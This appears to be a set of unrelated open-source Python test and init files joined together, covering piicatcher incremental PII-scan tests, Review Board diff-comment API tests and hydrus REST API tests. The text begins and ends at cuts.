tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
assert len(tasks) == 2
first_task = tasks[0]
second_task = tasks[1]
schemata = catalog.search_schema(source_like=source.name, schema_like="%")
# sample table should have earlier timestamp
sample_table = catalog.get_table(
source_name=source.name, schema_name=schemata[0].name, table_name="sample"
)
assert sample_table.updated_at < first_task.updated_at
assert sample_table.updated_at < second_task.updated_at
# full_pii and no_pii should have timestamp between tasks as they are not scanned because of include_table_regex
for table_name in ["no_pii", "full_pii", "partial_pii"]:
table = catalog.get_table(
source_name=source.name,
schema_name=schemata[0].name,
table_name=table_name,
)
assert table.updated_at > first_task.updated_at
assert table.updated_at < second_task.updated_at
for column in catalog.get_columns_for_table(table):
assert column.updated_at > first_task.updated_at
assert column.updated_at < second_task.updated_at
# partial_data_type.ssn should have the latest timestamps
partial_data_type = catalog.get_table(
source_name=source.name,
schema_name=schemata[0].name,
table_name="partial_data_type",
)
assert partial_data_type.updated_at > first_task.updated_at
assert partial_data_type.updated_at < second_task.updated_at
partial_data_type_id = catalog.get_column(
source_name=source.name,
schema_name=schemata[0].name,
table_name="partial_data_type",
column_name="id",
)
assert partial_data_type_id.updated_at > first_task.updated_at
assert partial_data_type_id.updated_at < second_task.updated_at
partial_data_type_ssn = catalog.get_column(
source_name=source.name,
schema_name=schemata[0].name,
table_name="partial_data_type",
column_name="ssn",
)
assert partial_data_type_ssn.updated_at > first_task.updated_at
assert (
second_task.updated_at - partial_data_type_ssn.updated_at
) < datetime.timedelta(seconds=3)


def test_incremental_column_generator(setup_incremental):
    catalog, source_id = setup_incremental
    with catalog.managed_session:
        source = catalog.get_source_by_id(source_id)
        tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))

        count = 0
        for tpl in column_generator(catalog=catalog, source=source):
            count += 1
        assert count == 24

        count = 0
        for tpl in column_generator(
            catalog=catalog, source=source, last_run=tasks[0].updated_at
        ):
            count += 1
        assert count == 8


def test_incremental_data_generator(setup_incremental):
    catalog, source_id = setup_incremental
    with catalog.managed_session:
        source = catalog.get_source_by_id(source_id)
        tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))

        count = 0
        for tpl in data_generator(catalog=catalog, source=source):
            count += 1
        assert count == 434

        count = 0
        for tpl in data_generator(
            catalog=catalog, source=source, last_run=tasks[0].updated_at
        ):
            count += 1
        assert count == 14


def test_incremental_tabular_output(setup_incremental):
    catalog, source_id = setup_incremental
    with catalog.managed_session:
        source = catalog.get_source_by_id(source_id)
        tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
        assert len(tasks) == 2

        first_task = tasks[0]
        second_task = tasks[1]

        # List all PII columns
        op = output_tabular(catalog=catalog, source=source)
        assert len(op) == 9

        # List all PII columns with include_filter
        op = output_tabular(
            catalog=catalog, source=source, include_table_regex=["partial_data_type"]
        )
        assert len(op) == 1

        # List after first task.
        op = output_tabular(
            catalog=catalog, source=source, last_run=first_task.updated_at
        )
        assert len(op) == 1

        # List for second task
        op = output_tabular(
            catalog=catalog, source=source, last_run=second_task.updated_at
        )
        assert len(op) == 0


sqlite_all = {
    "name": "sqlite_src",
    "schemata": [
        {
            "name": "",
            "tables": [
                {
                    "columns": [
                        {"data_type": "VARCHAR(255)", "name": "address", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 0},
                        {"data_type": "VARCHAR(255)", "name": "city", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 6},
                        {"data_type": "VARCHAR(255)", "name": "email", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Email", "sort_order": 7},
                        {"data_type": "VARCHAR(255)", "name": "fname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 8},
                        {"data_type": "VARCHAR(255)", "name": "gender", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Gender", "sort_order": 9},
                        {"data_type": "VARCHAR(255)", "name": "lname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 11},
                        {"data_type": "VARCHAR(255)", "name": "maiden_name", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 12},
                        {"data_type": "VARCHAR(255)", "name": "state", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 14},
                    ],
                    "name": "sample",
                },
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                },
            ],
        }
    ],
}

pg_all = {
    "name": "pg_src",
    "schemata": [
        {
            "name": "public",
            "tables": [
                {
                    "columns": [
                        {"data_type": "varchar", "name": "gender", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Gender", "sort_order": 1},
                        {"data_type": "varchar", "name": "maiden_name", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 3},
                        {"data_type": "varchar", "name": "lname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 4},
                        {"data_type": "varchar", "name": "fname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 5},
                        {"data_type": "varchar", "name": "address", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 6},
                        {"data_type": "varchar", "name": "city", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 7},
                        {"data_type": "varchar", "name": "state", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 8},
                        {"data_type": "varchar", "name": "email", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Email", "sort_order": 11},
                    ],
                    "name": "sample",
                },
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                },
            ],
        }
    ],
}

mysql_all = {
    "name": "mysql_src",
    "schemata": [
        {
            "name": "piidb",
            "tables": [
                {
                    "columns": [
                        {"data_type": "varchar", "name": "email", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Email", "sort_order": 3},
                        {"data_type": "varchar", "name": "gender", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Gender", "sort_order": 8},
                        {"data_type": "varchar", "name": "maiden_name", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 10},
                        {"data_type": "varchar", "name": "lname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 11},
                        {"data_type": "varchar", "name": "fname", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Person", "sort_order": 12},
                        {"data_type": "varchar", "name": "address", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 13},
                        {"data_type": "varchar", "name": "city", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 14},
                        {"data_type": "varchar", "name": "state", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "Address", "sort_order": 15},
                    ],
                    "name": "sample",
                },
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                },
            ],
        }
    ],
}

sqlite_one = {
    "name": "sqlite_src",
    "schemata": [
        {
            "name": "",
            "tables": [
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                }
            ],
        }
    ],
}

pg_one = {
    "name": "pg_src",
    "schemata": [
        {
            "name": "public",
            "tables": [
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                }
            ],
        }
    ],
}

mysql_one = {
    "name": "mysql_src",
    "schemata": [
        {
            "name": "piidb",
            "tables": [
                {
                    "columns": [
                        {"data_type": "text", "name": "ssn", "pii_plugin": "ColumnNameRegexDetector", "pii_type": "SSN", "sort_order": 1}
                    ],
                    "name": "partial_data_type",
                }
            ],
        }
    ],
}


def test_incremental_dict_output(setup_incremental):
    catalog, source_id = setup_incremental
    with catalog.managed_session:
        source = catalog.get_source_by_id(source_id)
        tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
        assert len(tasks) == 2

        first_task = tasks[0]
        second_task = tasks[1]

        # List all PII columns
        op = output_dict(catalog=catalog, source=source)
        if source.source_type == "sqlite":
            assert op == sqlite_all
        elif source.source_type == "postgresql":
            assert op == pg_all
        elif source.source_type == "mysql":
            assert op == mysql_all

        # include filter
        op = output_dict(
            catalog=catalog, source=source, include_table_regex=["partial_data_type"]
        )
        if source.source_type == "sqlite":
            assert op == sqlite_one
        elif source.source_type == "postgresql":
            assert op == pg_one
        elif source.source_type == "mysql":
            assert op == mysql_one

        # List after first task.
        op = output_dict(catalog=catalog, source=source, last_run=first_task.updated_at)
        if source.source_type == "sqlite":
            assert op == sqlite_one
        elif source.source_type == "postgresql":
            assert op == pg_one
        elif source.source_type == "mysql":
            assert op == mysql_one

        # List for second task
        op = output_dict(
            catalog=catalog, source=source, last_run=second_task.updated_at
        )
        assert op == {}


@pytest.mark.order(-1)
def test_full_scan(setup_incremental):
    catalog, source_id = setup_incremental
    with catalog.managed_session:
        source = catalog.get_source_by_id(source_id)
        time.sleep(1)
        scan_database(catalog=catalog, source=source, incremental=False)

        # there should be 3 tasks.
        tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
        assert len(tasks) == 3

        schemata = catalog.search_schema(source_like=source.name, schema_like="%")
        updated_cols = 0
        for table_name in [
            "no_pii",
            "full_pii",
            "partial_pii",
            "partial_data_type",
            "sample",
        ]:
            table = catalog.get_table(
                source_name=source.name,
                schema_name=schemata[0].name,
                table_name=table_name,
            )
            updated_cols += len(
                list(
                    catalog.get_columns_for_table(table, newer_than=tasks[1].updated_at)
                )
            )
        assert updated_cols == 11


# --- keras_multi_head/__init__.py (repo: SchenbergZY/keras-multi-head, license: MIT) ---
from .multi_head import MultiHead
from .multi_head_attention import MultiHeadAttention
__version__ = '0.23.0'


# --- reviewboard/webapi/tests/test_review_reply_diff_comment.py (repo: pombredanne/reviewboard, license: MIT) ---
from reviewboard.reviews.models import Comment
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import (
    review_reply_diff_comment_item_mimetype,
    review_reply_diff_comment_list_mimetype)
from reviewboard.webapi.tests.mixins import (
    BasicTestsMetaclass,
    ReviewRequestChildItemMixin,
    ReviewRequestChildListMixin)
from reviewboard.webapi.tests.mixins_comment import (
    CommentReplyItemMixin,
    CommentReplyListMixin)
from reviewboard.webapi.tests.urls import (
    get_review_reply_diff_comment_item_url,
    get_review_reply_diff_comment_list_url)


class ResourceListTests(CommentReplyListMixin, ReviewRequestChildListMixin,
                        BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
    """Testing the ReviewReplyDiffCommentResource list APIs."""

    fixtures = ['test_users', 'test_scmtools']
    sample_api_url = \
        'review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/'
    resource = resources.review_reply_diff_comment

    def setup_review_request_child_test(self, review_request):
        if not review_request.repository_id:
            # The group tests don't create a repository by default.
            review_request.repository = self.create_repository()
            review_request.save()

        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review_request.publish(review_request.submitter)

        review = self.create_review(review_request, publish=True)
        self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=self.user)

        return (get_review_reply_diff_comment_list_url(reply),
                review_reply_diff_comment_list_mimetype)

    def compare_item(self, item_rsp, comment):
        self.assertEqual(item_rsp['id'], comment.pk)
        self.assertEqual(item_rsp['text'], comment.text)

        if comment.rich_text:
            self.assertEqual(item_rsp['text_type'], 'markdown')
        else:
            self.assertEqual(item_rsp['text_type'], 'plain')

    #
    # HTTP GET tests
    #

    def setup_basic_get_test(self, user, with_local_site, local_site_name,
                             populate_items):
        review_request = self.create_review_request(
            create_repository=True,
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, user=user)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=user)

        if populate_items:
            items = [
                self.create_diff_comment(reply, filediff, reply_to=comment),
            ]
        else:
            items = []

        return (get_review_reply_diff_comment_list_url(reply, local_site_name),
                review_reply_diff_comment_list_mimetype,
                items)

    #
    # HTTP POST tests
    #

    def setup_basic_post_test(self, user, with_local_site, local_site_name,
                              post_valid_data):
        review_request = self.create_review_request(
            create_repository=True,
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, user=user, publish=True)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=user)

        return (get_review_reply_diff_comment_list_url(reply, local_site_name),
                review_reply_diff_comment_item_mimetype,
                {
                    'reply_to_id': comment.pk,
                    'text': 'Test comment',
                },
                [reply, comment])

    def check_post_result(self, user, rsp, reply, comment):
        reply_comment = Comment.objects.get(pk=rsp['diff_comment']['id'])
        self.assertEqual(reply_comment.text, 'Test comment')
        self.assertEqual(reply_comment.reply_to, comment)
        self.assertFalse(reply_comment.rich_text)
        self.compare_item(rsp['diff_comment'], reply_comment)

    def test_post_with_http_303(self):
        """Testing the
        POST review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/ API
        with second instance of same reply
        """
        comment_text = "My New Comment Text"

        review_request = self.create_review_request(
            create_repository=True,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, publish=True)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=self.user)
        reply_comment = self.create_diff_comment(reply, filediff,
                                                 reply_to=comment)

        # Now do it again.
        rsp = self.api_post(
            get_review_reply_diff_comment_list_url(reply),
            {
                'reply_to_id': comment.pk,
                'text': comment_text
            },
            expected_status=303,
            expected_mimetype=review_reply_diff_comment_item_mimetype)

        self.assertEqual(rsp['stat'], 'ok')

        reply_comment = Comment.objects.get(pk=rsp['diff_comment']['id'])
        self.assertEqual(reply_comment.text, comment_text)


class ResourceItemTests(CommentReplyItemMixin, ReviewRequestChildItemMixin,
                        BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
    """Testing the ReviewReplyDiffCommentResource item APIs."""

    fixtures = ['test_users', 'test_scmtools']
    sample_api_url = \
        'review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/<id>/'
    resource = resources.review_reply_diff_comment

    def setup_review_request_child_test(self, review_request):
        if not review_request.repository_id:
            # The group tests don't create a repository by default.
            review_request.repository = self.create_repository()
            review_request.save()

        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review_request.publish(review_request.submitter)

        review = self.create_review(review_request, publish=True)
        self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=self.user)

        return (get_review_reply_diff_comment_list_url(reply),
                review_reply_diff_comment_list_mimetype)

    def compare_item(self, item_rsp, comment):
        self.assertEqual(item_rsp['id'], comment.pk)
        self.assertEqual(item_rsp['text'], comment.text)

        if comment.rich_text:
            self.assertEqual(item_rsp['text_type'], 'markdown')
        else:
            self.assertEqual(item_rsp['text_type'], 'plain')

    #
    # HTTP DELETE tests
    #

    def setup_basic_delete_test(self, user, with_local_site, local_site_name):
        review_request = self.create_review_request(
            create_repository=True,
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, user=user, publish=True)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=user)
        reply_comment = self.create_diff_comment(reply, filediff,
                                                 reply_to=comment)

        return (
            get_review_reply_diff_comment_item_url(
                reply, reply_comment.pk, local_site_name),
            [reply_comment, reply]
        )

    def check_delete_result(self, user, reply_comment, reply):
        # The deleted comment, not the reply itself, is what must be gone.
        self.assertNotIn(reply_comment, reply.comments.all())

    #
    # HTTP GET tests
    #

    def setup_basic_get_test(self, user, with_local_site, local_site_name):
        review_request = self.create_review_request(
            create_repository=True,
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, user=user, publish=True)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=user)
        reply_comment = self.create_diff_comment(
            reply, filediff, reply_to=comment)

        return (
            get_review_reply_diff_comment_item_url(
                reply, reply_comment.pk, local_site_name),
            review_reply_diff_comment_item_mimetype,
            reply_comment
        )

    #
    # HTTP PUT tests
    #

    def setup_basic_put_test(self, user, with_local_site, local_site_name,
                             put_valid_data):
        review_request = self.create_review_request(
            create_repository=True,
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request, user=user, publish=True)
        comment = self.create_diff_comment(review, filediff)
        reply = self.create_reply(review, user=user)
        reply_comment = self.create_diff_comment(reply, filediff,
                                                 reply_to=comment)

        return (
            get_review_reply_diff_comment_item_url(
                reply, reply_comment.pk, local_site_name),
            review_reply_diff_comment_item_mimetype,
            {
                'text': 'Test comment',
            },
            reply_comment,
            [])

    def check_put_result(self, user, item_rsp, comment, *args):
        comment = Comment.objects.get(pk=comment.pk)
        self.assertEqual(item_rsp['id'], comment.pk)
        self.assertEqual(item_rsp['text'], 'Test comment')
        self.assertEqual(comment.text, 'Test comment')
        self.assertFalse(comment.rich_text)


# --- src/envs/__init__.py (repo: jainraj/CISR_NeurIPS20, license: MIT) ---
from src.envs.frozen_lake.utils import *
from src.envs.CMDP import CMDP, LagrangianMDP, LagrangianMDPMonitor
from src.envs.frozen_lake.frozen_lake_custom import *
from src.envs.dummy_envs import *


# --- hydrus/tests/test_app.py (repo: vcode11/hydrus, license: MIT) ---
"""Test for checking if the response format is proper. Run test_crud before running this."""
import unittest
import random
import string
import json
import re
import uuid
from hydrus.app_factory import app_factory
from hydrus.socketio_factory import create_socket
from hydrus.utils import set_session, set_doc, set_api_name, set_page_size
from hydrus.data import doc_parse, crud
from hydra_python_core import doc_maker
from hydra_python_core.doc_writer import HydraLink
from hydrus.samples import doc_writer_sample
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from hydrus.data.db_models import Base


def gen_dummy_object(class_title, doc):
    """Create a dummy object based on the definitions in the API Doc.

    :param class_title: Title of the class whose object is being created.
    :param doc: ApiDoc.
    :return: A dummy object of class `class_title`.
    """
    object_ = {
        "@type": class_title
    }
    for class_path in doc.parsed_classes:
        if class_title == doc.parsed_classes[class_path]["class"].title:
            for prop in doc.parsed_classes[class_path]["class"].supportedProperty:
                if isinstance(prop.prop, HydraLink) or prop.write is False:
                    continue
                if "vocab:" in prop.prop:
                    prop_class = prop.prop.replace("vocab:", "")
                    object_[prop.title] = gen_dummy_object(prop_class, doc)
                else:
                    object_[prop.title] = ''.join(random.choice(
                        string.ascii_uppercase + string.digits) for _ in range(6))
            return object_


class ViewsTestCase(unittest.TestCase):
    """Test Class for the app."""

    @classmethod
    def setUpClass(self):
        """Database setup before the tests."""
        print("Creating a temporary database...")
        engine = create_engine('sqlite:///:memory:')
        Base.metadata.create_all(engine)
        session = scoped_session(sessionmaker(bind=engine))

        self.session = session
        self.API_NAME = "demoapi"
        self.page_size = 1
        self.HYDRUS_SERVER_URL = "http://hydrus.com/"

        self.app = app_factory(self.API_NAME)
        self.socketio = create_socket(self.app, self.session)
        print("going for create doc")

        self.doc = doc_maker.create_doc(
            doc_writer_sample.api_doc.generate(),
            self.HYDRUS_SERVER_URL,
            self.API_NAME)
        test_classes = doc_parse.get_classes(self.doc.generate())
        test_properties = doc_parse.get_all_properties(test_classes)
        doc_parse.insert_classes(test_classes, self.session)
        doc_parse.insert_properties(test_properties, self.session)
        print("Classes and properties added successfully.")

        print("Setting up hydrus utilities... ")
        self.api_name_util = set_api_name(self.app, self.API_NAME)
        self.session_util = set_session(self.app, self.session)
        self.doc_util = set_doc(self.app, self.doc)
        self.page_size_util = set_page_size(self.app, self.page_size)
        self.client = self.app.test_client()

        print("Creating utilities context... ")
        self.api_name_util.__enter__()
        self.session_util.__enter__()
        self.doc_util.__enter__()
        self.client.__enter__()

        print("Setup done, running tests...")

    @classmethod
    def tearDownClass(self):
        """Tear down temporary database and exit utilities"""
        self.client.__exit__(None, None, None)
        self.doc_util.__exit__(None, None, None)
        self.session_util.__exit__(None, None, None)
        self.api_name_util.__exit__(None, None, None)
        self.session.close()

    def setUp(self):
        for class_ in self.doc.parsed_classes:
            link_props = {}
            class_title = self.doc.parsed_classes[class_]["class"].title
            dummy_obj = gen_dummy_object(class_title, self.doc)
            for supportedProp in self.doc.parsed_classes[class_]['class'].supportedProperty:
                if isinstance(supportedProp.prop, HydraLink):
                    class_name = supportedProp.prop.range.replace("vocab:", "")
                    for collection_path in self.doc.collections:
                        coll_class = self.doc.collections[
                            collection_path]['collection'].class_.title
                        if class_name == coll_class:
                            id_ = str(uuid.uuid4())
                            crud.insert(
                                gen_dummy_object(class_name, self.doc),
                                id_=id_,
                                session=self.session)
                            link_props[supportedProp.title] = id_
                            dummy_obj[supportedProp.title] = "{}/{}/{}".format(
                                self.API_NAME, collection_path, id_)
            crud.insert(
                dummy_obj,
                id_=str(
                    uuid.uuid4()),
                link_props=link_props,
                session=self.session)
            # If it's a collection class then add an extra object so
            # we can test pagination thoroughly.
            if class_ in self.doc.collections:
                crud.insert(
                    dummy_obj,
                    id_=str(
                        uuid.uuid4()),
                    session=self.session)

    def test_Index(self):
        """Test for the index."""
        response_get = self.client.get("/{}".format(self.API_NAME))
        endpoints = json.loads(response_get.data.decode('utf-8'))
        response_post = self.client.post(
            "/{}".format(self.API_NAME), data=dict(foo="bar"))
        response_put = self.client.put(
            "/{}".format(self.API_NAME), data=dict(foo="bar"))
        response_delete = self.client.delete("/{}".format(self.API_NAME))
        assert "@context" in endpoints
        assert endpoints["@id"] == "/{}".format(self.API_NAME)
        assert endpoints["@type"] == "EntryPoint"
        assert response_get.status_code == 200
        assert response_post.status_code == 405
        assert response_put.status_code == 405
        assert response_delete.status_code == 405

    def test_EntryPoint_context(self):
        """Test for the EntryPoint context."""
        response_get = self.client.get(
            "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME))
        response_get_data = json.loads(response_get.data.decode('utf-8'))
        response_post = self.client.post(
            "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={})
        response_delete = self.client.delete(
            "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME))
        assert response_get.status_code == 200
        assert "@context" in response_get_data
        assert response_post.status_code == 405
        assert response_delete.status_code == 405

    def test_Vocab(self):
        """Test the vocab."""
        response_get = self.client.get("/{}/vocab#".format(self.API_NAME))
        response_get_data = json.loads(response_get.data.decode('utf-8'))
        assert "@context" in response_get_data
        assert response_get_data["@type"] == "ApiDocumentation"
        assert response_get_data["@id"] == "{}{}/vocab".format(
            self.HYDRUS_SERVER_URL, self.API_NAME)
        assert response_get.status_code == 200

        response_delete = self.client.delete(
            "/{}/vocab#".format(self.API_NAME))
        assert response_delete.status_code == 405

        response_put = self.client.put(
            "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar')))
        assert response_put.status_code == 405

        response_post = self.client.post(
            "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar')))
        assert response_post.status_code == 405

    def test_Collections_GET(self):
        """Test GET on collection endpoints."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                response_get = self.client.get(endpoints[endpoint])
                assert response_get.status_code == 200
                response_get_data = json.loads(
                    response_get.data.decode('utf-8'))
                assert "@context" in response_get_data
                assert "@id" in response_get_data
                assert "@type" in response_get_data
                assert "members" in response_get_data
                # Check the item URI has the valid format, so it can be dereferenced
                if len(response_get_data["members"]) > 0:
                    for item in response_get_data["members"]:
                        class_type = item["@type"]
                        if class_type in self.doc.parsed_classes:
                            class_ = self.doc.parsed_classes[class_type]["class"]
                            class_methods = [
                                x.method for x in class_.supportedOperation]
                            if "GET" in class_methods:
                                item_response = self.client.get(
                                    response_get_data["members"][0]["@id"])
                                assert item_response.status_code == 200

    def test_pagination(self):
        """Test basic pagination"""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                response_get = self.client.get(endpoints[endpoint])
                assert response_get.status_code == 200
                response_get_data = json.loads(
                    response_get.data.decode('utf-8'))
                assert "view" in response_get_data
                assert "first" in response_get_data["view"]
                assert "last" in response_get_data["view"]
                if "next" in response_get_data["view"]:
                    response_next = self.client.get(response_get_data["view"]["next"])
                    assert response_next.status_code == 200
                    response_next_data = json.loads(
                        response_next.data.decode('utf-8'))
                    assert "previous" in response_next_data["view"]
                break

    def test_Collections_PUT(self):
        """Test insert data to the collection."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                dummy_object = gen_dummy_object(
                    collection.class_.title, self.doc)
                good_response_put = self.client.put(
                    endpoints[endpoint], data=json.dumps(dummy_object))
                assert good_response_put.status_code == 201

    def test_object_POST(self):
        """Test replace of a given object using ID."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_methods = [x.method for x in class_.supportedOperation]
                dummy_object = gen_dummy_object(
                    collection.class_.title, self.doc)
                initial_put_response = self.client.put(
                    endpoints[endpoint], data=json.dumps(dummy_object))
                assert initial_put_response.status_code == 201
                response = json.loads(
                    initial_put_response.data.decode('utf-8'))
                regex = r'(.*)ID (.{36})* (.*)'
                matchObj = re.match(regex, response["description"])
                assert matchObj is not None
                id_ = matchObj.group(2)
                if "POST" in class_methods:
                    dummy_object = gen_dummy_object(
                        collection.class_.title, self.doc)
                    post_replace_response = self.client.post(
                        '{}/{}'.format(endpoints[endpoint], id_),
                        data=json.dumps(dummy_object))
                    assert post_replace_response.status_code == 200

    def test_object_DELETE(self):
        """Test DELETE of a given object using ID."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_methods = [x.method for x in class_.supportedOperation]
                dummy_object = gen_dummy_object(
                    collection.class_.title, self.doc)
                initial_put_response = self.client.put(
                    endpoints[endpoint], data=json.dumps(dummy_object))
                assert initial_put_response.status_code == 201
                response = json.loads(
                    initial_put_response.data.decode('utf-8'))
                regex = r'(.*)ID (.{36})* (.*)'
                matchObj = re.match(regex, response["description"])
                assert matchObj is not None
                id_ = matchObj.group(2)
                if "DELETE" in class_methods:
                    delete_response = self.client.delete(
                        '{}/{}'.format(endpoints[endpoint], id_))
                    assert delete_response.status_code == 200

    def test_object_PUT_at_id(self):
        """Create object in collection using PUT at specific ID."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_methods = [x.method for x in class_.supportedOperation]
                dummy_object = gen_dummy_object(
                    collection.class_.title, self.doc)
                if "PUT" in class_methods:
                    dummy_object = gen_dummy_object(
                        collection.class_.title, self.doc)
                    put_response = self.client.put('{}/{}'.format(
                        endpoints[endpoint], uuid.uuid4()),
                        data=json.dumps(dummy_object))
                    assert put_response.status_code == 201

    def test_object_PUT_at_ids(self):
        """Create multiple objects in a collection using PUT at specific IDs."""
        index = self.client.get("/{}".format(self.API_NAME))
        assert index.status_code == 200
        endpoints = json.loads(index.data.decode('utf-8'))
        for endpoint in endpoints:
            collection_name = "/".join(endpoints[endpoint].split(
                "/{}/".format(self.API_NAME))[1:])
            if collection_name in self.doc.collections:
                collection = self.doc.collections[collection_name]["collection"]
                class_ = self.doc.parsed_classes[collection.class_.title]["class"]
                class_methods = [x.method for x in class_.supportedOperation]
                data_ = {"data": list()}
                objects = list()
                ids = ""
                # Use `_` so the loop counter does not shadow the `index`
                # response above, and accumulate the IDs instead of
                # overwriting them on each iteration.
                for _ in range(3):
                    objects.append(gen_dummy_object(
                        collection.class_.title, self.doc))
                    ids += "{},".format(uuid.uuid4())
                data_["data"] = objects
                if "PUT" in class_methods:
                    put_response = self.client.put(
